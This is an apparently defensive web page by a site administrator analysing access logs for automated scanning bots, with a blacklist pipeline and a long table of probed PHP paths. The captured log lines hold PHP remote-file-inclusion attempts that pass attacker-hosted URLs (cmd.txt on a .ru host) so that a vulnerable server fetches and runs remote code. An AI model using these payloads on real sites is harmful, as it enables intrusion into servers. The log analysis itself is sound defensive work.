Softpanorama
(slightly skeptical) Open Source Software Educational Society

May the source be with you, but remember the KISS principle ;-)

Softpanorama Search

Web Scanning Zombies

News Recommended Links            
May June July August September November October Decemeber

Recently the number of "strange" access record in web logs jumped and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I have found manually:  

213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/%3Elanguage.shtml/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 383 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:12 -0700] "GET /Scripting/Phprama/%3Cwbr%20/%3Ecommand_line_php.shtml/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 393 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/Phprama/%3Cwbr%20/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79"
66.230.197.170 - - [23/Jun/2007:06:25:53 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.805"
24.117.228.198 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://dezzign.ru/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"

One common thing for those record is the usage of libwww.perl. Greping on this string brings us more complete picture reproduced in  Zombies bulletin

Extracting IP addresses gives you the first draft of the "blacklist" and that top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe which can be made into a function or shell script:

grep 'libwww.perl' $1 | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > $1.dirty

Below are the results of processing of the list from above: 

20	83.149.125.174	home.w-sieci.pl
18	80.67.20.21	mayermail.de
12	200.69.222.122	contactar01.gestionarnet.com
11	64.78.163.2	nickentgolf.com
11	62.193.224.166	wpc0230.amenworld.com
10	86.109.161.201	lincl239.ns1.couldix.com
 9	87.230.2.113	lvps87-230-2-113.dedicated.hosteurope.de
 9	85.214.55.73	mind-creations.net
 7	193.192.249.157	
 6	87.118.96.254	ns.km22206-02.keymachine.de
 6	72.55.153.108	ip-72-55-153-108.static.privatedns.com
 6	66.147.239.104	host.1sbs.com
 6	216.246.52.59	server.dynasoft.com.ph
 6	213.195.77.225	225.77.195.213.ibercom.com
 5	217.115.197.51	node11.cluster.nxs.nl

Old News

Scanning attempts for November, 2009

Filter .php$: 442 different pages-url
Total: 4267 different pages-url		 Viewed Average size Entry Exit  
/index.php 257 234 Bytes 48 100


//index.php 146 234 Bytes 44 38


/Scripting/Phprama/php_debugging.shtml/common/db.php 117 95.07 KB 45 9


/Scripting/php.shtml/common/db.php 111 207.67 KB 8 45


/errors.php 101 234 Bytes 31 27


/Malware/Malicious_web/index.php 92 178 Bytes 16 16


/Malware/Malicious_web/Bulletin/index.php 71 178 Bytes 4 29


/Malware/index.php 51 178 Bytes 6 6


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 40 63.59 KB 9 2


/Malware/Malicious_web/errors.php 38 178 Bytes 12 17


/Lang/Javarama/Websphere/index.shtml/appserv/main.php 37 38.60 KB 25 23


/WWW/alternatives_to_adobe_products.shtml/accounts/inc/include.p... 28 142.60 KB 7 7


/Net/Netutils/netcat.shtml/s_loadenv.inc.php 27 66.84 KB 15 3


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 27 63.59 KB 17 16


/Scripting/Phprama/php_debugging.shtml/errors.php 26 95.07 KB 8 6


/Tools/dd.shtml/s_loadenv.inc.php 24 191.04 KB 2 11


/Scripting/php.shtml/index.php 24 207.67 KB 10 6


/Security/IDS/Snort/snort_related_perl_scripts.shtml/include/edi... 23 97.94 KB 14 11


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 23 63.59 KB 4 1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 21 63.59 KB 4 9


//errors.php 20 234 Bytes 11 3


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 20 57.86 KB 11 7


/WWW/blogs.shtml/skin/salz_gallery/ask_password.php 19 445.79 KB 11 11


/Malware/Malicious_web/Bulletin/errors.php 16 178 Bytes 1 7


/Scripting/Phprama/php_debugging.shtml/playing.php/common/db.php 16 95.07 KB 6  


/Scripting/php.shtml/port.php 15 207.67 KB 11 2


/Scripting/php.shtml/include.php 15 207.67 KB 6 5


/Scripting/Phprama/command_line_php.shtml/index.php 14 239.53 KB 4 3


/DB/index.shtml/includes/database.php 13 283.20 KB 2  


/Solaris/oss_for_solaris.shtml/load_lang.php 13 197.13 KB 5 3


/Scripting/php.shtml/phpwcms/include/inc_ext/spaw/dialogs/table.... 13 207.67 KB 3 9


/WWW/blogs.shtml/skin/salz_dierectnnormal_gallery/setup.php 13 445.79 KB 6 7


/Net/Netutils/netcat.shtml/netcat/modules/auth.inc.php 12 66.84 KB 2  


/Security/port_scan_detectors.shtml/port.php 12 201 Bytes   7


/Scripting/php.shtml/administrator/components/com_joomlaradiov5/... 12 207.67 KB 5 5


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 11 63.59 KB 8 2


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 11 63.59 KB 7 6


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 11 63.59 KB 9 9


/Scripting/index.shtml/includes/database.php 10 266.28 KB    


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 9 63.59 KB 3 3


/WWW/Hosting/cheap_hosting_with_ssh_access.shtml/phpAdsNew/view.... 9 120.61 KB 4 3


/Lang/java.shtml/include/_bot.php 9 426.19 KB 3  


/Scripting/php.shtml/station/playing.php/playing.php/common/db.p... 8 207.67 KB   2


/Tools/index.shtml/index.php 8 119.56 KB   3


/Internals/kernel_modules.shtml/modules/xoopsgallery/upgrade_alb... 8 37.60 KB 1 1


/WWW/ssi.shtml/includes/search.php 8 30.42 KB   3


/Xwindows/VNC/vnc_on_linux.shtml/bbs/bbs/tb.php/connect.lib.php 8 128.19 KB 1  


/Scripting/Phprama/php_debugging.shtml/station/playing.php/playi... 8 95.07 KB 2  


/Tools/dd.shtml/index.php 8 191.04 KB 3 1


/Net/Netutils/netcat.shtml/netcat/modules/forum.inc.php 7 66.84 KB    


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 7 63.59 KB 4 4


/WWW/search_engines.shtml/sphider/admin/configset.php 7 146.26 KB 3 3


/Tools/tar.shtml/index.php 7 114.30 KB 2  


/Scripting/Phprama/command_line_php.shtml/accounts.php 6 239.53 KB 4 3


/Security/classic_sec_tools.shtml/netcat/modules/auth.inc.php 6 68.38 KB 1  


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 6 63.59 KB 4 4


/Solaris/oss_for_solaris.shtml/load_phplib.php 6 197.13 KB 1 1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 6 63.59 KB 2 5


/WWW/search_engines.shtml/index.php 6 146.26 KB 1 1


/Net/Netutils/netcat.shtml/index.php 6 66.84 KB 2 2


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 6 63.59 KB 5 5


/WWW/ssi.shtml/home/conlib/local.php 6 30.42 KB 1  


/Scripting/php.shtml/playing.php/common/db.php 6 207.67 KB   5


/Scripting/tcl.shtml/fiber/stats_URL/page.php 5 167.26 KB 2  


/Scripting/index.shtml/index.php 5 266.28 KB 3  


/Solaris/Security/RBAC/conversion_of_application_accounts_to_rol... 5 125.99 KB 1 2


/WWW/ssi.shtml/includes/kb_constants.php 5 30.42 KB 4 3


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 5 63.59 KB 4 5


/WWW/ssi.shtml/conlib/local.php 5 30.42 KB   1


/Scripting/php.shtml/template.php 5 207.67 KB 1 1


/Security/network_ids.shtml/common/db.php 5 215.87 KB 4 4


/Tools/tr.shtml/comments.php 5 67.23 KB 2 2


/Tools/tr.shtml/admin/index.php 5 67.23 KB 5 5


/Solaris/oss_for_solaris.shtml/php/init.poll.php 4 197.13 KB 4 2


/People/Stallman/prophet.shtml/modules/Calendar/admin/update.php 4 635.71 KB 4 1


/VM/index.shtml/show_news_inc.php 4 192.44 KB   2


/Commercial_linuxes/RHEL/index.shtml/[Time-Assistant_path]/lib/t... 4 194.12 KB   1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 4 63.59 KB 1 1


/Tools/Find/find_examples.shtml/examples/phonebook.php 4 71.07 KB 4 3


/Lang/Javarama/Websphere/index.shtml/main.php 4 38.60 KB 3 3


/Security/classic_sec_tools.shtml/netcat/modules/forum.inc.php 4 68.38 KB    


/Lang/index.shtml/modules/Calendar/admin/update.php 4 224.64 KB 1 1


/VM/suse_on_microsoft_virtual_pc.shtml/show_news_inc.php 4 78.13 KB 2  


/Tools/dd.shtml/e404.php 4 191.04 KB    


/Net/Netutils/netcat.shtml/modules/forum.inc.php 4 66.84 KB 2  


/WWW/Hosting/cheap_hosting_with_ssh_access.shtml/shoutbox/expand... 4 120.61 KB 1 1


/Net/Application_layer/NIS/nis_netgroups.shtml/index.php 4 59.98 KB 1  


/WWW/Webservers/apache_security.shtml/nota.php 4 57.75 KB 1 1


/Solaris/Security/Bulletin/hardening2003.shtml/login.php 4 126.55 KB 2  


/Security/IDS/acid.shtml/tools/send_reminders.php 4 156.07 KB 2 2


/Scripting/php.shtml/SSI.php 4 207.67 KB 2 2


/WWW/ssi.shtml/class_item.php 4 30.42 KB   1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 4 63.59 KB   1


/Editors/Vimorama/Bulletin/vimorama2003.shtml/surveys/survey.inc... 4 26.93 KB 1 1


/DB/oracle.shtml/includes/database.php 4 84.01 KB   1


/Solaris/oss_for_solaris.shtml/index.php 4 197.13 KB 2 2


/Scripting/python.shtml/xmlrpc.php 4 443.09 KB 2 4


/Scripting/php.shtml/administrator/components/com_webring/admin.... 4 207.67 KB 2 1


/Security/classic_sec_tools.shtml/modules/forum.inc.php 4 68.38 KB   2


/OFM/Bulletin/OFM_bulletin_2006.shtml/errors.php 3 57.16 KB   2


/Scripting/Shellorama/Bulletin/shellorama2004.shtml/index.php 3 74.20 KB 2 1


/WWW/apache.shtml/index.php 3 21.88 KB 1  


/Net/Netutils/netcat.shtml/s_e404.inc.php 3 66.84 KB    


/Malware/Malicious_web/zombies.shtml/load_lang.php 3 8.64 KB 1 2


/WWW/blogs.shtml/skin/salz_default_gallery/setup.php 3 445.79 KB 2 3


/Tools/tr.shtml/cmd/product_info.php/products_id/1622/shop_conte... 3 67.23 KB 2  


/Scripting/Phprama/php_debugging.shtml/skins/advanced/advanced.p... 3 95.07 KB 3 3


/Scripting/Phprama/command_line_php.shtml/accounts/inc/include.p... 3 239.53 KB 2 1


/Tools/tee.shtml/cmd/product_info.php/products_id/1622/shop_cont... 3 37.30 KB   2


/OSS/mindcraft_fiasco.shtml/include/_bot.php 3 50.64 KB   3


/Net/Netutils/netcat.shtml/modules/auth.inc.php 3 66.84 KB 1  


/Commercial_unixes/AIX/aix_open_source.shtml/bemarket/postscript... 3 259.74 KB 2 1


/Admin/index.shtml/admin/doeditconfig.php 3 232.74 KB 2 2


/Scripting/php.shtml/s_loadenv.inc.php 3 207.67 KB 2 2


/Scripting/php.shtml/modules/xoopsgallery/init_basic.php 3 207.67 KB 2 2


/Commercial_linuxes/RHEL/index.shtml/[OES_path]/includes/lib-gro... 3 194.12 KB   1


/OSS/index.shtml/ro/_en/components/com_moofaq/includes/file_incl... 3 245.84 KB 2 2


/Commercial_unixes/AIX/OSS/compiling_apache13_on_aix.shtml/index... 3 52.92 KB    


/Security/IDS/acid.shtml/[OES_path]/includes/lib-group.inc.php 3 156.07 KB 1  


/Tools/m4.shtml/errors.php 3 86.71 KB 2  


/WWW/ssi.shtml/contenido/includes/include.newsletter_jobs_subnav... 3 30.42 KB 3 2


/WWW/blogs.shtml/skin/salz/setup.php 3 445.79 KB 1 1


/Tools/dd.shtml/plugins/safehtml/HTMLSax3.php 3 191.04 KB   1


/Tools/dd.shtml/s_e404.inc.php 3 191.04 KB    


/Scripting/Bulletin/scripting2004.shtml/templates/headline_temp.... 3 150.83 KB 2 2


/Scripting/php.shtml/day.php 3 207.67 KB 2 2


/OSS/webliography.shtml/modules/Calendar/admin/update.php 3 417.62 KB   3


/Security/Hardening/history.shtml/cgi-bin/index/admin.php 3 51.30 KB   1


/Security/classic_sec_tools.shtml/modules/auth.inc.php 3 68.38 KB   1


/Scripting/php.shtml/errors.php 3 207.67 KB 2 1


/Scripting/php.shtml/db.php 3 207.67 KB   1


/Net/Netutils/netcat.shtml/plugins/safehtml/HTMLSax3.php 3 66.84 KB 2  


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 3 63.59 KB 2 2


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 3 63.59 KB 1  


/Security/IDS/snort.shtml/plugins/tree/plug.inc.php 3 97.82 KB   1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 3 63.59 KB 1  


/Solaris/index.shtml/direct.php 3 300.87 KB 3 3


/Security/IDS/acid.shtml/plugins/tree/plug.inc.php 3 156.07 KB 1  


/Scripting/php.shtml/shop.php 3 207.67 KB 3 3


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 3 63.59 KB 2 2


/WWW/Webservers/web_server_security.shtml/nota.php 3 20.16 KB   1


/SE/halloween.shtml/modules/Calendar/admin/update.php 3 242 Bytes    


/DB/Mysql/tutorial.shtml/bbs/skin/buzzard_espoon/setup.php 3 51.74 KB 2 2


/Logs/Syslog_ng/configuring_syslogng_to_send_logs.shtml/src/inde... 3 18.69 KB 3 1


/WWW/Hosting/cheap_hosting_with_ssh_access.shtml/include/main.ph... 3 120.61 KB 2 2


/Tools/dd.shtml/error.php 2 191.04 KB 1 1


/WWW/Hosting/cheap_hosting_with_ssh_access.shtml/templates/error... 2 120.61 KB 2 2


/Scripting/Phprama/php_debugging.shtml/accounts.php 2 95.07 KB   1


/Freenix/freebsd.shtml/php/init.poll.php 2 269.38 KB   2


/Scripting/Phprama/command_line_php.shtml/tmp.php 2 239.53 KB 1 2


/Solaris/solaris_tips.shtml/phpshop/index.php 2 116.67 KB 1 1


/Security/classic_sec_tools.shtml/s_loadenv.inc.php 2 68.38 KB    


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 2 63.59 KB 2 2


/Bulletin/Humor/index.shtml/templates/errors.php 2 189.71 KB 1  


/WWW/blogs.shtml/faq2.php 2 111.48 KB 2 2


/Admin/index.shtml/errors.php 2 232.80 KB    


/Commercial_linuxes/index.shtml/administrator/components/com_web... 2 345.58 KB   1


/Social/oss_in_developing_countries.shtml/index.php 2 166.96 KB 2  


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 2 63.59 KB 1 1


/DB/mysql.shtml/xmlrpc.php 2 106.60 KB 2 2


/Admin/Event_correlation/index.shtml/include/_bot.php 2 365.09 KB    


/Internals/kernel_modules.shtml/modules/coppermine/themes/defaul... 2 37.60 KB 1 1


/Scripting/php.shtml/write.php 2 207.67 KB 2 2


/Tools/tr.shtml/pollphp/textfile/admin/common.inc.php 2 67.23 KB 1 1


/Scripting/php.shtml/skin/pqbig_board_blue/login.php 2 207.67 KB   1


/Tools/Sort/unix_sort_examples_collection.shtml/examples/phonebo... 2 50.14 KB 1 2


/WWW/ssi.shtml/file_includer.php 2 30.42 KB 1  


/Logs/Syslog_ng/configuration_examples.shtml/src/album.class.php 2 29.74 KB   2


/Access_control/Suid/guid_suid_checkers.shtml/include/prodler.cl... 2 31.00 KB    


/Scripting/php.shtml/appserv/main.php 2 207.67 KB 1 1


/Logs/Syslog_ng/configuring_syslogng_to_send_logs.shtml/src/albu... 2 18.69 KB 2  


/Security/Filesystem_security/guid_suid_checkers.shtml/include/p... 2 31.84 KB   1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 2 63.59 KB 1  


/Security/IDS/acid.shtml/hall.php 2 156.07 KB 1 2


/Commercial_unixes/AIX/OSS/compiling_apache_on_aix.shtml/index.p... 2 38.49 KB 1  


/VM/xen_on_suse.shtml/mindmeld/acweb/admin_index.php 2 132.46 KB 1 1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 2 63.59 KB 1 1


/Utilities/Screen/screenrc_examples.shtml/echo.or.id/forum/searc... 2 118.87 KB    


/Solaris/Security/Bulletin/hardening2003.shtml/phprojekt/lib/lib... 2 126.55 KB 1 1


/Skeptics/Pseudoscience/harvard_mafia.shtml/login/secure.php 2 168.41 KB 2 2


/Scripting/shells.shtml/main_prepend.php 2 80.27 KB 1  


/Tools/tr.shtml/textfile/admin/common.inc.php 2 67.23 KB 1 1


/Admin/index.shtml/vieworder.php 2 232.74 KB 1 1


/Internals/kernel_modules.shtml/xmlrpc.php 2 37.60 KB 2  


/Scripting/php.shtml/*.php 2 207.67 KB 1 1


/Net/Internet_layer/arp.shtml/images/errors.php 2 140.20 KB 2 2


/Scripting/index.shtml/assets/snippets/reflect/snippet.reflect.p... 2 266.28 KB 1 1


/Scripting/php.shtml/txt-db-api.php 2 207.67 KB 1  


/Commercial_unixes/AIX/OSS/compiling_php_on_aix.shtml/includes/i... 2 41.54 KB    


/WWW/Hosting/cheap_hosting_with_ssh_access.shtml/phprojekt/lib/l... 2 120.61 KB 1 1


/Scripting/Shellorama/history.shtml/modules/coppermine/docs/menu... 2 127.78 KB 1 1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 2 63.59 KB 2 2


/Tools/dd.shtml/s_list.inc.php 2 191.04 KB 1 1


/Malware/Malicious_web/Bulletin/web_zombies_bulletin070623.shtml... 2 63.59 KB 1 1


/Commercial_unixes/AIX/aix_profile_and_kshrc_files.shtml/toknowu... 2 36.16 KB 1 1


/Scripting/Phprama/php_debugging.shtml/list.php 2 95.07 KB   1


/Tools/cut.shtml/index.php 2 74.48 KB   1


/WWW/ssi.shtml/function_core.php 2 30.42 KB 2 2


/Scripting/tcl.shtml/shells.php 2 167.26 KB 1 1


/Solaris/oss_for_solaris.shtml/includes/modify.php 2 197.13 KB 1 1


/Net/Application_layer/ntp.shtml/index.php 2 89.51 KB 1  


/OFM/Ofm_06.shtml/admin/functions/PhpCommander/upload.php 2 188 Bytes 1 1


/Tools/tr.shtml/admin/common.inc.php 2 67.23 KB 1 1


/Scripting/php.shtml/administrator/components/com_mosmedia/inclu... 2 207.67 KB 2 2


/Net/Netutils/ngrep.shtml/s_loadenv.inc.php 2 25.91 KB   2


/Admin/Tivoli/TEC/tec_installation.shtml/login.php 2 57.30 KB 1 1


/Xwindows/exporting_display.shtml/echo.or.id/forum/search.php 2 69.72 KB   1


/Net/Netutils/ngrep.shtml/netcat/modules/forum.inc.php